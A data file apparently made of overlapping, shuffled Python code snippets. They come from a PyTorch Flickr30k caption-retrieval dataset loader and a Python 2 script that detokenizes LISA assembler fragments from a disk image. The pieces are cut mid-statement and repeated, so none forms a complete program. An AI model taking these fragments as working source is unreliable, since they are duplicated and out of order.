"entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry =",
"the # LICENSE file in the root directory of this source tree. import",
"if self._dataset_type != \"train\": return entry, self.imgs image_id = entry[\"image_id\"] while True: #",
"random image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])]",
"imageId: i for i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self):",
"metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type !=",
"import numpy as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path,",
"metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path,",
"a list of caption annotations. entries = [] imgid2entry = {} count =",
"= imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as",
"Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path,",
"imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f:",
"remove_ids = np.load(test_id_path) remove_ids = [int(x) for x in remove_ids] for annotation in",
"remove_ids = [int(x) for x in remove_ids] for annotation in reader: image_id =",
"LICENSE file in the root directory of this source tree. import jsonlines import",
"\"train\": with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for key, value in",
"self.imgs = [] with jsonlines.open(imdb_path) as reader: # Build an index which maps",
"= random.choice(self.image_id_list) if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image",
"img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True:",
"def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path)",
"= 0 remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x)",
"# LICENSE file in the root directory of this source tree. import jsonlines",
"index which maps image id with a list of caption annotations. entries =",
"if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for",
"in the root directory of this source tree. import jsonlines import torch import",
"\"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader: # Build an index which",
"remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for x",
"as f: image_info = cPickle.load(f) for key, value in image_info.items(): setattr(self, key, value)",
"key, value) self.train_imgId2pool = { imageId: i for i, imageId in enumerate(self.train_image_list) }",
"= entry[\"image_id\"] while True: # sample a random image: img_id2 = random.choice(self.image_id_list) if",
"if self._dataset_type == \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for",
"self.db_size def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type != \"train\": return entry,",
"self.train_imgId2pool = { imageId: i for i, imageId in enumerate(self.train_image_list) } self.db_size =",
"== \"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1,",
"self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info",
"# random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] )",
"random image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])]",
"def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = [] with",
"1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type ==",
"self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs image_id = entry[\"image_id\"] while True:",
"jsonlines.open(imdb_path) as reader: # Build an index which maps image id with a",
"i for i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return",
"self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader: # Build an",
"while True: # sample a random image: img_id2 = random.choice(self.image_id_list) if img_id2 !=",
"an index which maps image id with a list of caption annotations. entries",
"list of caption annotations. entries = [] imgid2entry = {} count = 0",
"file in the root directory of this source tree. import jsonlines import torch",
"0 remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for",
"cPickle.load(f) for key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId:",
"Facebook, Inc. and its affiliates. # This source code is licensed under the",
"key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId: i for",
"value in image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId: i for i,",
"Inc. and its affiliates. # This source code is licensed under the MIT",
"# This source code is licensed under the MIT license found in the",
"self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx",
"= int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample",
"image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] #",
"image wrong while True: # sample a random image: img_id3 = random.choice(self.image_id_list) if",
"+= 1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type",
"[] imgid2entry = {} count = 0 remove_ids = [] if test_id_path: remove_ids",
"image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: # sample",
"while True: # sample a random image: img_id3 = random.choice(self.image_id_list) if img_id3 !=",
"and int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\":",
"hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 =",
"@property def metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata = x def",
"[int(x) for x in remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if",
"annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type",
"img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random",
"sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry = imgid2entry",
"= len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx): entry = self._entries[idx] if",
"rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else:",
"while True: # sample a random image: img_id4 = random.choice(self.image_id_list) if img_id4 !=",
"for i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return self.db_size",
"= dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self): return self._metadata",
"\"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))]"
] |
[
"the return 0 # array is 0 then stop return array.pop() + arraysum(array)",
"List def arraysum(array: List[int]) -> int: \"\"\" Get the sum of all the",
"elements using divide and concuer method. Parameters ---------- array: List[int] An array/list of",
"\"\"\" if len(array) == 0: # The base case: if the length of",
"the # elements and call itself with them if __name__ == '__main__': print(f\"{arraysum([1,",
"sum of all the elements in the array. arraysum ======== The `arraysum` function",
"\"\"\" Get the sum of all the elements in the array. arraysum ========",
"int: \"\"\" Get the sum of all the elements in the array. arraysum",
"its elements using divide and concuer method. Parameters ---------- array: List[int] An array/list",
"using divide and concuer method. Parameters ---------- array: List[int] An array/list of integers",
"the elements in the array. arraysum ======== The `arraysum` function takes an array",
"and call itself with them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4,",
"arraysum(array: List[int]) -> int: \"\"\" Get the sum of all the elements in",
"array is 0 then stop return array.pop() + arraysum(array) # Divide and conquer:",
"array # into first element and rest of the # elements and call",
"-> int: \"\"\" Get the sum of all the elements in the array.",
"sum of all of its elements using divide and concuer method. Parameters ----------",
"array \"\"\" if len(array) == 0: # The base case: if the length",
"into first element and rest of the # elements and call itself with",
"arraysum(array) # Divide and conquer: divide the array # into first element and",
"import List def arraysum(array: List[int]) -> int: \"\"\" Get the sum of all",
"all of its elements using divide and concuer method. Parameters ---------- array: List[int]",
"# The base case: if the length of the return 0 # array",
"the array \"\"\" if len(array) == 0: # The base case: if the",
"divide and concuer method. Parameters ---------- array: List[int] An array/list of integers Returns",
"array. arraysum ======== The `arraysum` function takes an array and returns the sum",
"Divide and conquer: divide the array # into first element and rest of",
"element and rest of the # elements and call itself with them if",
"Returns ------- sum: int Sum of all the elements in the array \"\"\"",
"the sum of all of its elements using divide and concuer method. Parameters",
"0: # The base case: if the length of the return 0 #",
"stop return array.pop() + arraysum(array) # Divide and conquer: divide the array #",
"returns the sum of all of its elements using divide and concuer method.",
"of integers Returns ------- sum: int Sum of all the elements in the",
"The base case: if the length of the return 0 # array is",
"in the array. arraysum ======== The `arraysum` function takes an array and returns",
"sum: int Sum of all the elements in the array \"\"\" if len(array)",
"# array is 0 then stop return array.pop() + arraysum(array) # Divide and",
"from typing import List def arraysum(array: List[int]) -> int: \"\"\" Get the sum",
"the elements in the array \"\"\" if len(array) == 0: # The base",
"if len(array) == 0: # The base case: if the length of the",
"return 0 # array is 0 then stop return array.pop() + arraysum(array) #",
"The `arraysum` function takes an array and returns the sum of all of",
"integers Returns ------- sum: int Sum of all the elements in the array",
"function takes an array and returns the sum of all of its elements",
"List[int] An array/list of integers Returns ------- sum: int Sum of all the",
"Parameters ---------- array: List[int] An array/list of integers Returns ------- sum: int Sum",
"is 0 then stop return array.pop() + arraysum(array) # Divide and conquer: divide",
"0 then stop return array.pop() + arraysum(array) # Divide and conquer: divide the",
"of its elements using divide and concuer method. Parameters ---------- array: List[int] An",
"method. Parameters ---------- array: List[int] An array/list of integers Returns ------- sum: int",
"------- sum: int Sum of all the elements in the array \"\"\" if",
"Get the sum of all the elements in the array. arraysum ======== The",
"of all of its elements using divide and concuer method. Parameters ---------- array:",
"# elements and call itself with them if __name__ == '__main__': print(f\"{arraysum([1, 2,",
"`arraysum` function takes an array and returns the sum of all of its",
"elements in the array \"\"\" if len(array) == 0: # The base case:",
"Sum of all the elements in the array \"\"\" if len(array) == 0:",
"call itself with them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4, 5,",
"of all the elements in the array. arraysum ======== The `arraysum` function takes",
"length of the return 0 # array is 0 then stop return array.pop()",
"and conquer: divide the array # into first element and rest of the",
"all the elements in the array \"\"\" if len(array) == 0: # The",
"return array.pop() + arraysum(array) # Divide and conquer: divide the array # into",
"all the elements in the array. arraysum ======== The `arraysum` function takes an",
"array/list of integers Returns ------- sum: int Sum of all the elements in",
"array and returns the sum of all of its elements using divide and",
"the length of the return 0 # array is 0 then stop return",
"conquer: divide the array # into first element and rest of the #",
"if the length of the return 0 # array is 0 then stop",
"of all the elements in the array \"\"\" if len(array) == 0: #",
"first element and rest of the # elements and call itself with them",
"int Sum of all the elements in the array \"\"\" if len(array) ==",
"---------- array: List[int] An array/list of integers Returns ------- sum: int Sum of",
"concuer method. Parameters ---------- array: List[int] An array/list of integers Returns ------- sum:",
"base case: if the length of the return 0 # array is 0",
"== 0: # The base case: if the length of the return 0",
"arraysum ======== The `arraysum` function takes an array and returns the sum of",
"typing import List def arraysum(array: List[int]) -> int: \"\"\" Get the sum of",
"of the # elements and call itself with them if __name__ == '__main__':",
"the sum of all the elements in the array. arraysum ======== The `arraysum`",
"if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4, 5, 6, 7]) = }\")",
"rest of the # elements and call itself with them if __name__ ==",
"0 # array is 0 then stop return array.pop() + arraysum(array) # Divide",
"======== The `arraysum` function takes an array and returns the sum of all",
"divide the array # into first element and rest of the # elements",
"then stop return array.pop() + arraysum(array) # Divide and conquer: divide the array",
"in the array \"\"\" if len(array) == 0: # The base case: if",
"array.pop() + arraysum(array) # Divide and conquer: divide the array # into first",
"<filename>Algorithms/Divide-and-Conquer/Python/main.py from typing import List def arraysum(array: List[int]) -> int: \"\"\" Get the",
"def arraysum(array: List[int]) -> int: \"\"\" Get the sum of all the elements",
"List[int]) -> int: \"\"\" Get the sum of all the elements in the",
"and concuer method. Parameters ---------- array: List[int] An array/list of integers Returns -------",
"array: List[int] An array/list of integers Returns ------- sum: int Sum of all",
"case: if the length of the return 0 # array is 0 then",
"# Divide and conquer: divide the array # into first element and rest",
"+ arraysum(array) # Divide and conquer: divide the array # into first element",
"the array. arraysum ======== The `arraysum` function takes an array and returns the",
"and returns the sum of all of its elements using divide and concuer",
"and rest of the # elements and call itself with them if __name__",
"of the return 0 # array is 0 then stop return array.pop() +",
"the array # into first element and rest of the # elements and",
"elements in the array. arraysum ======== The `arraysum` function takes an array and",
"elements and call itself with them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3,",
"# into first element and rest of the # elements and call itself",
"len(array) == 0: # The base case: if the length of the return",
"an array and returns the sum of all of its elements using divide",
"itself with them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4, 5, 6,",
"An array/list of integers Returns ------- sum: int Sum of all the elements",
"with them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4, 5, 6, 7])",
"them if __name__ == '__main__': print(f\"{arraysum([1, 2, 3, 4, 5, 6, 7]) =",
"takes an array and returns the sum of all of its elements using"
] |
[
"(XXX but can you have a line of length $d?) continue elif line[0]",
"b in line: if b >= ord(' ') and b < 127: s",
"when # inline comment follows s += chr(b & 0x7f) lastascii = True",
"elif line[0] != len(line): if line[0] < len(line) and line[line[0]] == 0x20: #",
"= line[2:] # rest must be ASCII: operand, comment s = '' lastascii",
"ord(' ') and b < 127: s += chr(b) lastascii = True else:",
"0xc4: 'cmp', # very likely but not 100% sure about these 0x86: 'bne',",
"happen with labels, kind of # a two-part line s = ''.join([ chr(b)",
"in line[1:line[0]] ]) print s line = line[line[0]+1:] else: # skip, probably corrupted",
"licensing information # Partial detokenization of LISA assembler fragments found in a binary",
"s if __name__ == '__main__': if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0],",
"line[1:line[0]] ]) print s line = line[line[0]+1:] else: # skip, probably corrupted or",
"line[0] != len(line): if line[0] < len(line) and line[line[0]] == 0x20: # seems",
"LISA assembler fragments found in a binary file. import sys TOKENS = {",
"LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr', #",
"lastascii = False print s if __name__ == '__main__': if len(sys.argv) != 2:",
"bytes 0xdf: '.asc', # ASCII string, no terminator } def process(): lines =",
"b < 127: s += chr(b) lastascii = True else: if lastascii ==",
"# skip, probably corrupted or not part # of assembly fragment print '[...]'",
"line[0] & 0x80: # opcode token and operand format byte if line[0] in",
"to happen with labels, kind of # a two-part line s = ''.join([",
"comment follows s += chr(b & 0x7f) lastascii = True else: s +=",
"'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc',",
"not 100% sure about these 0x86: 'bne', 0x87: 'beq', # directives prepended with",
"if len(line) == 0: # skip (XXX but can you have a line",
"0x20: # seems to happen with labels, kind of # a two-part line",
"in line: if b >= ord(' ') and b < 127: s +=",
"per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr',",
"= { # reversed by comparing assembly fragments to Mystery House disasm #",
"# opcode token and operand format byte if line[0] in TOKENS: print '\\t'",
"bytes 0xe4: '.hex', # one or more hex bytes 0xdf: '.asc', # ASCII",
"of # a two-part line s = ''.join([ chr(b) for b in line[1:line[0]]",
"one or more hex bytes 0xdf: '.asc', # ASCII string, no terminator }",
"def process(): lines = disk.split(chr(0x0d)) for line in lines: if len(line) == 0:",
"by comparing assembly fragments to Mystery House disasm # later verified against LISA",
"s += chr(b) lastascii = True else: if lastascii == True and b",
"lastascii = True else: if lastascii == True and b & 0x80: #",
"and operand format byte if line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else:",
"0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0:",
"operand field when # inline comment follows s += chr(b & 0x7f) lastascii",
"'__main__': if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f =",
"s = ''.join([ chr(b) for b in line[1:line[0]] ]) print s line =",
"0xdf: '.asc', # ASCII string, no terminator } def process(): lines = disk.split(chr(0x0d))",
"0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad:",
"+ TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]), line = line[2:] #",
"2-byte word #0xe4: '.db', # one or more hex bytes 0xe4: '.hex', #",
"# see LICENSE file for licensing information # Partial detokenization of LISA assembler",
"LICENSE file for licensing information # Partial detokenization of LISA assembler fragments found",
"of assembly fragment print '[...]' continue line = line[1:] # lose length byte",
"one or more hex bytes 0xe4: '.hex', # one or more hex bytes",
"# end of operand field when # inline comment follows s += chr(b",
"must be ASCII: operand, comment s = '' lastascii = True for b",
"# Python < 3 # see LICENSE file for licensing information # Partial",
"line of length $d?) continue elif line[0] != len(line): if line[0] < len(line)",
"} def process(): lines = disk.split(chr(0x0d)) for line in lines: if len(line) ==",
"0x7f) lastascii = True else: s += ' %02x ' % b lastascii",
"very likely but not 100% sure about these 0x86: 'bne', 0x87: 'beq', #",
"# very likely but not 100% sure about these 0x86: 'bne', 0x87: 'beq',",
"later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac:",
"end of operand field when # inline comment follows s += chr(b &",
"be ASCII: operand, comment s = '' lastascii = True for b in",
"line = line[2:] # rest must be ASCII: operand, comment s = ''",
"0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', #",
"True else: s += ' %02x ' % b lastascii = False print",
"chr(b & 0x7f) lastascii = True else: s += ' %02x ' %",
"but not 100% sure about these 0x86: 'bne', 0x87: 'beq', # directives prepended",
"0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99:",
"at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr', # 2-byte word",
"0x80: # opcode token and operand format byte if line[0] in TOKENS: print",
"b lastascii = False print s if __name__ == '__main__': if len(sys.argv) !=",
"and b < 127: s += chr(b) lastascii = True else: if lastascii",
"Partial detokenization of LISA assembler fragments found in a binary file. import sys",
"operand format byte if line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else: print",
"& 0x80: # high bit seems to flag the # end of operand",
"# of assembly fragment print '[...]' continue line = line[1:] # lose length",
"= line[line[0]+1:] else: # skip, probably corrupted or not part # of assembly",
"'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very",
"lines = disk.split(chr(0x0d)) for line in lines: if len(line) == 0: # skip",
"0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely",
"for b in line: if b >= ord(' ') and b < 127:",
"these 0x86: 'bne', 0x87: 'beq', # directives prepended with '.' to distinguish from",
"0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96:",
"# one or more hex bytes 0xe4: '.hex', # one or more hex",
"# skip (XXX but can you have a line of length $d?) continue",
"opcode token and operand format byte if line[0] in TOKENS: print '\\t' +",
"# directives prepended with '.' to distinguish from assembly instrs # names updated",
"high bit seems to flag the # end of operand field when #",
"'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty',",
"<reponame>aycock/mh<filename>detokenizefrag.py # Python < 3 # see LICENSE file for licensing information #",
"'.asc', # ASCII string, no terminator } def process(): lines = disk.split(chr(0x0d)) for",
"0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1:",
"__name__ == '__main__': if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit()",
"if b >= ord(' ') and b < 127: s += chr(b) lastascii",
"print '[...]' continue line = line[1:] # lose length byte # opcode on",
"< 127: s += chr(b) lastascii = True else: if lastascii == True",
"False print s if __name__ == '__main__': if len(sys.argv) != 2: print 'Usage\"",
"(line[0], line[1]), line = line[2:] # rest must be ASCII: operand, comment s",
"= True for b in line: if b >= ord(' ') and b",
"on line? if line[0] & 0x80: # opcode token and operand format byte",
"# seems to happen with labels, kind of # a two-part line s",
"# inline comment follows s += chr(b & 0x7f) lastascii = True else:",
"skip (XXX but can you have a line of length $d?) continue elif",
"lose length byte # opcode on line? if line[0] & 0x80: # opcode",
"& 0x80: # opcode token and operand format byte if line[0] in TOKENS:",
"if len(sys.argv) != 2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1],",
"file. import sys TOKENS = { # reversed by comparing assembly fragments to",
"'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely but",
"information # Partial detokenization of LISA assembler fragments found in a binary file.",
"for licensing information # Partial detokenization of LISA assembler fragments found in a",
"for b in line[1:line[0]] ]) print s line = line[line[0]+1:] else: # skip,",
"or not part # of assembly fragment print '[...]' continue line = line[1:]",
"instrs # names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', #",
"likely but not 100% sure about these 0x86: 'bne', 0x87: 'beq', # directives",
"b >= ord(' ') and b < 127: s += chr(b) lastascii =",
"to Mystery House disasm # later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp",
"at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda',",
"%02x ' % b lastascii = False print s if __name__ == '__main__':",
"# a two-part line s = ''.join([ chr(b) for b in line[1:line[0]] ])",
"line[1:] # lose length byte # opcode on line? if line[0] & 0x80:",
"continue elif line[0] != len(line): if line[0] < len(line) and line[line[0]] == 0x20:",
"assembly fragments to Mystery House disasm # later verified against LISA decoder at",
"disasm # later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca:",
"disk.split(chr(0x0d)) for line in lines: if len(line) == 0: # skip (XXX but",
"to flag the # end of operand field when # inline comment follows",
"0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp', # very likely but not 100% sure",
"opcode on line? if line[0] & 0x80: # opcode token and operand format",
"'beq', # directives prepended with '.' to distinguish from assembly instrs # names",
"TOKENS[line[0]], else: print '%02x %02x' % (line[0], line[1]), line = line[2:] # rest",
"word #0xe4: '.db', # one or more hex bytes 0xe4: '.hex', # one",
"for line in lines: if len(line) == 0: # skip (XXX but can",
"%02x' % (line[0], line[1]), line = line[2:] # rest must be ASCII: operand,",
"# names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte",
"# one or more hex bytes 0xdf: '.asc', # ASCII string, no terminator",
"verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax',",
"updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8:",
"0xd8: '.adr', # 2-byte word #0xe4: '.db', # one or more hex bytes",
"'.dw', # 2-byte word 0xd8: '.adr', # 2-byte word #0xe4: '.db', # one",
"len(line) and line[line[0]] == 0x20: # seems to happen with labels, kind of",
"# rest must be ASCII: operand, comment s = '' lastascii = True",
"# 2-byte word 0xd8: '.adr', # 2-byte word #0xe4: '.db', # one or",
"0x80: # high bit seems to flag the # end of operand field",
"!= len(line): if line[0] < len(line) and line[line[0]] == 0x20: # seems to",
"if line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x %02x' %",
"line[2:] # rest must be ASCII: operand, comment s = '' lastascii =",
"#0xe4: '.db', # one or more hex bytes 0xe4: '.hex', # one or",
"]) print s line = line[line[0]+1:] else: # skip, probably corrupted or not",
"distinguish from assembly instrs # names updated per LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp",
"probably corrupted or not part # of assembly fragment print '[...]' continue line",
"0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0:",
"and line[line[0]] == 0x20: # seems to happen with labels, kind of #",
"sys TOKENS = { # reversed by comparing assembly fragments to Mystery House",
"else: if lastascii == True and b & 0x80: # high bit seems",
"and b & 0x80: # high bit seems to flag the # end",
"in a binary file. import sys TOKENS = { # reversed by comparing",
"# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb: 'jsr', 0xca: 'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf:",
"# opcode on line? if line[0] & 0x80: # opcode token and operand",
"bit seems to flag the # end of operand field when # inline",
"= '' lastascii = True for b in line: if b >= ord('",
"# reversed by comparing assembly fragments to Mystery House disasm # later verified",
"# 2-byte word #0xe4: '.db', # one or more hex bytes 0xe4: '.hex',",
"part # of assembly fragment print '[...]' continue line = line[1:] # lose",
"not part # of assembly fragment print '[...]' continue line = line[1:] #",
"'bne', 0x87: 'beq', # directives prepended with '.' to distinguish from assembly instrs",
"corrupted or not part # of assembly fragment print '[...]' continue line =",
"lines: if len(line) == 0: # skip (XXX but can you have a",
"lastascii = True else: s += ' %02x ' % b lastascii =",
"flag the # end of operand field when # inline comment follows s",
"directives prepended with '.' to distinguish from assembly instrs # names updated per",
"# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr', # 2-byte word #0xe4:",
"https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp #0xd8: '.dw', # 2-byte word 0xd8: '.adr', # 2-byte word #0xe4: '.db',",
"Python < 3 # see LICENSE file for licensing information # Partial detokenization",
"'cmp', # very likely but not 100% sure about these 0x86: 'bne', 0x87:",
"comparing assembly fragments to Mystery House disasm # later verified against LISA decoder",
"'sta', 0x96: 'brk', 0xad: 'tay', 0x99: 'clc', 0xd1: 'stx', 0xc0: 'adc', 0xc4: 'cmp',",
"chr(b) for b in line[1:line[0]] ]) print s line = line[line[0]+1:] else: #",
"else: s += ' %02x ' % b lastascii = False print s",
"'jmp', 0xac: 'tax', 0xce: 'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta',",
"Mystery House disasm # later verified against LISA decoder at # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp 0xcb:",
"0: # skip (XXX but can you have a line of length $d?)",
"byte if line[0] in TOKENS: print '\\t' + TOKENS[line[0]], else: print '%02x %02x'",
"< len(line) and line[line[0]] == 0x20: # seems to happen with labels, kind",
"0x86: 'bne', 0x87: 'beq', # directives prepended with '.' to distinguish from assembly",
"file for licensing information # Partial detokenization of LISA assembler fragments found in",
"'ldx', 0xcd: 'lda', 0xcf: 'ldy', 0xd2: 'sty', 0xd0: 'sta', 0x96: 'brk', 0xad: 'tay',",
"python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb') disk = bytearray(f.read()) f.close() process()",
"2: print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb') disk =",
"s += chr(b & 0x7f) lastascii = True else: s += ' %02x",
"more hex bytes 0xe4: '.hex', # one or more hex bytes 0xdf: '.asc',",
"'.' to distinguish from assembly instrs # names updated per LISA decoder at",
"lastascii == True and b & 0x80: # high bit seems to flag",
"% (line[0], line[1]), line = line[2:] # rest must be ASCII: operand, comment",
"skip, probably corrupted or not part # of assembly fragment print '[...]' continue",
"terminator } def process(): lines = disk.split(chr(0x0d)) for line in lines: if len(line)",
"token and operand format byte if line[0] in TOKENS: print '\\t' + TOKENS[line[0]],",
"'' lastascii = True for b in line: if b >= ord(' ')",
"# lose length byte # opcode on line? if line[0] & 0x80: #",
"a two-part line s = ''.join([ chr(b) for b in line[1:line[0]] ]) print",
"print 'Usage\" python', sys.argv[0], '<image.dsk>' exit() f = open(sys.argv[1], 'rb') disk = bytearray(f.read())",
"== True and b & 0x80: # high bit seems to flag the",
"you have a line of length $d?) continue elif line[0] != len(line): if",
"line[line[0]] == 0x20: # seems to happen with labels, kind of # a",
"seems to happen with labels, kind of # a two-part line s =",
